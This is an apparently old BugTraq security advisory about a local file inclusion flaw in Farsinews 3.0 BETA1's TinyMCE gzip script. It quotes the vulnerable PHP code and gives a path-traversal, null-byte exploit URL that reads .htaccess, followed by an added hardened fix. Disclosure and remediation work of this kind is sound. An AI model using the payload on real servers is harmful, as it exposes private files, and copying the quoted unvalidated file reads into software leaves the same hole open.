BugTraq
Local file inclusion in Farsinews3.0BETA1 Jul 10 2006 03:33PM
armin390 9mail com
If magic_quotes_gpc is Off in php.ini, then local file inclusion in /jscripts/tiny_mce/tiny_mce_gzip.php is available to use ;)!!

Why?

#code(jscripts/tiny_mce/tiny_mce_gzip.php)

...
$theme = isset($_REQUEST['theme']) ? $_REQUEST['theme'] : "";
$language = isset($_REQUEST['language']) ? $_REQUEST['language'] : "";
$plugins = isset($_REQUEST['plugins']) ? $_REQUEST['plugins'] : "";
...
if ($theme) {
    // Write main script and patch some things
    echo file_get_contents(realpath("tiny_mce" . $suffix . ".js"));
    echo 'TinyMCE.prototype.loadScript = function() {};';
    echo "tinyMCE.init(TinyMCECompressed_settings);";

    // Load theme, language pack and theme language packs
    echo file_get_contents(realpath("themes/" . $theme . "/editor_template" . $suffix . ".js"));
    echo file_get_contents(realpath("themes/" . $theme . "/langs/" . $language . ".js"));
    echo file_get_contents(realpath("langs/" . $language . ".js"));

#exploit

for example!:

http://target/jscripts/tiny_mce/tiny_mce_gzip.php?language=../../../../.htaccess%00&theme=advanced

...
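
A hardened form of the parameter handling quoted above, as an added example that is not part of the original post and not Farsinews or TinyMCE code: theme and language must match an allowlist pattern (which excludes "../" and the NUL byte sent as %00), and every resolved path must stay under the script directory. The helper names safe_name and read_contained and the empty $suffix are assumptions.

```php
<?php
// Added example, not Farsinews or TinyMCE code. Hardened handling of the
// 'theme' and 'language' parameters from the excerpt above.

// Accept only short identifier-like names: no '/', '.', '\' or NUL bytes.
// \A and \z anchor the whole string, so a trailing newline is rejected too.
function safe_name($value)
{
    if (!is_string($value) || !preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $value)) {
        return null;
    }
    return $value;
}

// Resolve $relative under $baseDir and refuse anything that escapes it.
function read_contained($baseDir, $relative)
{
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $relative);
    if ($base === false || $path === false) {
        return null; // base directory or target file does not exist
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null; // resolved outside the script directory
    }
    return is_file($path) ? file_get_contents($path) : null;
}

$theme    = safe_name(isset($_REQUEST['theme']) ? $_REQUEST['theme'] : '');
$language = safe_name(isset($_REQUEST['language']) ? $_REQUEST['language'] : '');
$suffix   = ''; // assumption: set elsewhere in the original script

if ($theme === null || $language === null) {
    header('HTTP/1.1 400 Bad Request');
    exit;
}

$files = array(
    "themes/$theme/editor_template$suffix.js",
    "themes/$theme/langs/$language.js",
    "langs/$language.js",
);
foreach ($files as $file) {
    $body = read_contained(__DIR__, $file);
    if ($body !== null) {
        echo $body;
    }
}
```

With this validation the behaviour no longer depends on the magic_quotes_gpc setting, because a value containing a NUL byte or path separators is rejected before any path is built.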
